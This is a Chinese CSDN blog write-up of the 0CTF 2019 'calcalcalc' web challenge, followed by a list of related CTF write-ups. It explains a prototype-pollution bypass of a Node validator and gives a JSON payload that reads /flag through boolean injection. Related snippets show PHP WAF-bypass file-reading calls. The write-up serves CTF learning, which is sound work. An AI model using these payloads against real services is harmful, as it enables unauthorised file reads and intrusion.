[0CTF2019]calcalcalc js污染,bool注入

最新推荐文章于 2021-10-08 17:40:45 发布
最新推荐文章于 2021-10-08 17:40:45 发布
阅读量760 收藏
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104246002
版权
本题是2019 RCTF calcalcalc的改版,这次限制了之前的时间延迟注入的问题,同时需要Bypass validator:
    validate(value: any, args: ValidationArguments) {
      const str = value ? value.toString() : '';
      if (str.length === 0) {
        return false;
      }
      if (!(args.object as CalculateModel).isVip) {
        if (str.length >= args.constraints[0]) {
          return false;
        }
      }
      if (str !== "114+514") {
        return false;
      }
      return true;
    },
},

我们可以看见,我们输入的式子必须的值必须为114+514
这里会使用toString来校验我们的数据,由于提供的数据类型类型是any,可以使用JSON数据进行原型链污染,从而绕过114+514的校验,绕过方式为

{"expression":"1+1","__proto__":{"b":"114+514"}}

最终的payload

{"__proto__": {}, "isVip": true, "expression": "1//1 and ord(open('/flag').read()[1]) >-1 and 1\n"}

参考链接
飘零师傅
梅子酒师傅

HyyMbb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1291
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP的
[RCTF2019]calcalcalc 命令执行的时间盲注~~
a3320315的博客
02-10 2095
0x01 题目源码 python from flask import Flask, request import bson import json import datetime app = Flask(__name__) @app.route("/", methods=["POST"]) def calculate(): data = request.get_data() ...
实战:2019 0ctf final Web Writeup(一)
systemino的博客
07-04 1031
前言 鸽了好久的题解,因为自己事务缠身,一直没时间写一下最近比赛的题解,趁近日有空,来填坑~ 第一次参加0ctf新星赛就拿了冠军,还是非常开心的。比赛过程中,web共4道题,我有幸做出3道,java实在不太擅长,哭了(另一道是ocaml的题目,涉及小trick和逻辑问题,准备放在后面和java一起编写(希望不要咕咕咕了)。这里写出另外两道题目的题解如下: 114514_calcalcalc ...
命令执行盲注
灰太的表格的博客
06-11 744
命令执行盲注 想练练写脚本,就自己搭了个环境。是关于命令执行shell_exec盲注的。环境代码写的也是简陋版的。flag在文件flag里 这是1.php的内容: 打开页面是这样的: 然后自己花了十多分钟写的脚本: import requests import time import string str=string.ascii_letters+string.digits str=str+"{}_-`~!@#$%^&*()+" result="" for i in range(1,30):
RCTF-2015——welpwn
05-11 319
64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF真题-Dest0g3CTF2022招新赛
06-01
CTF真题-Dest0g3CTF2022招新赛,来自BUUCTF。
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入和sqlmap的入门操作,...
SimpleCalc:这是一个非常简单的计算器,它使用基本运算符和浮点数
03-07
简单计算 这是一个非常简单的计算器,它使用基本运算符和浮点数。 使用:python3 Calc.py
[De1CTF 2019]9calc 这道题暂时还没搞明白,暂时做个记录~~
a3320315的博客
02-10 1074
参考链接 飘零师傅 梅子酒师傅 cacl_famliy
ctf [RoarCTF 2019]easy_calc
eliforsharon的博客
10-08 233
又学到了新的东西所以记录一下 首先很容易就能找到calc.php,但是url的get却输入不了字符,查询以后才发现要运用PHP的字符串解析特性。 利用PHP的字符串解析特性 利用PHP的字符串解析特性Bypass 这篇文章讲的蛮详细的,而本题的waf也应该是只允许输入数字,不允许输入字符串,用num=%20就可以bypass啦。 然后就可以通过chr进行绕过了。 查看目录 var_dump(scandir(chr(47))); 查看flagg var_dump(file_get_contents(c
web buuctf [RoarCTF 2019]Easy Calc1
weixin_44214568的博客
08-20 180
1. 这里面一共两个问题,一个是waf(WEB应用层上的防御策略),一个是脚本 2.根据提示我们查看一下calc.php文件 这段代码可以看到num传参的时候,哪些值会被过滤掉 脚本的绕过因为有代码所有可以有针对性的写,问题是我们需要得到权限,就必然会输入字符语句,但是字符会报错,所以问题在于waf的绕过(我想用多阶注入,但是没有节点),于是waf绕过一个是去改num的值,另外一个是改num,改num的值我是改不了,因为不知道里面写的啥,我们就改num,现在的问题是既要改num还要使nu..
calc全家桶
蚁景网安学院
10-29 525
前言zsx师傅tql!题目质量爆炸,三次出现每次都有完全不同的体验,但是又因为zsx师傅的wp有些地方有些省略,网上也没很好的wp,让人难以理解所以我这里就想整合一下三次的题目wp,加上...
[RoarCTF 2019]Easy Calc
热门推荐
沐目的博客
10-18 1万+
1.知识点 1.1PHP的字符串解析特性 这是别人对PHP字符串解析漏洞的理解, 我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id...
解网鼎杯一道web题(Calc)
洞若观火
08-23 2415
探测:roboot.txt 回显: Traceback (most recent call last):   File "/usr/local/lib/python2.7/dist-packages/tornado/web.py", line 1520, in _execute     result = self.prepare()   File "/usr/local/lib/python2....
[De1CTF 2019]SSRF Me
为之的博客
07-09 2968
打开网页就是源码,需要自己来美化,我去网上找过python代码在线美化工具,把注释去掉并美化后的代码惨不忍睹,还是自己动手搞搞 #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefa
[D3CTF 2019]EasyWeb
07-28
综上所述,\[D3CTF 2019\]EasyWeb可能涉及到使用兼容低版本的Smarty引擎、按需加载的类导致pop链难以找到,以及通过绕过过滤条件来获取flag的方法。 #### 引用[.reference_title] - *1* *2* [d3ctf easyweb题解]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值